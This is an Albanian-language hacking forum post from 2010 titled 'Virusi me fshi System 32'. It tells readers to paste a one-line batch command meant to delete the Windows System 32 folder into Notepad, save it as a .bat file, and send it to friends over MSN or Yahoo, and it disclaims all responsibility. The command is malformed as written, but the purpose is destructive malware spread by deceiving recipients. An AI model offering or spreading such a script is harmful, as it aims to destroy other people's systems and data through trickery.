Miresevini ne forum ju urojm te kaloni çaste te bukura dhe kenaqesi pa fund...

Powered By:Valmir Shala
 
ForumForum  PortalPortal  CalendarCalendar  PytësoriPytësori  KërkoKërko  Lista AnëtarëveLista Anëtarëve  Grupet e AnëtarëveGrupet e Anëtarëve  RegjistrohuRegjistrohu  identifikimi  

Share | 
 

 Virusi me fshi System 32

Shiko temën e mëparshme Shiko temën pasuese Shko poshtë 
AutoriMesazh
noah~hack
Admin
avatar

Numri i postimeve : 275
Join date : 24/01/2010
Age : 24

MesazhTitulli: Virusi me fshi System 32   Fri Jan 29, 2010 9:51 pm

Hape notpead
paste qit cod
@echo off del C:\\windows\System 32
save as name.bat
qojav shokve ne MSN Yahoo etc
kjo është per me fshi System 32
tung nuk marr pergjegjsi per kit virus
Ruju se munet me pas pc-n e mbrojtne e mun e Han ti ne ven te atina
Nuk Marr Pergjegjsi
tung klm

Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit http://www.v-shala.tk
 
Virusi me fshi System 32
Shiko temën e mëparshme Shiko temën pasuese Mbrapsht në krye 
Faqja 1 e 1
 Similar topics
-
» Pre-WotLK System Requirements
» Tau Smart Missile System
» SYSTEM-OF-A-DOWN app
» TCI Official Forum Ranking System
» WHAT SYSTEM ARE YOU GETTING BF3 FOR?

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
Miresevini ne forum ju urojm te kaloni çaste te bukura dhe kenaqesi pa fund...  :: Tutoriale&Mesime :: Hacking Tools-
Kërce tek: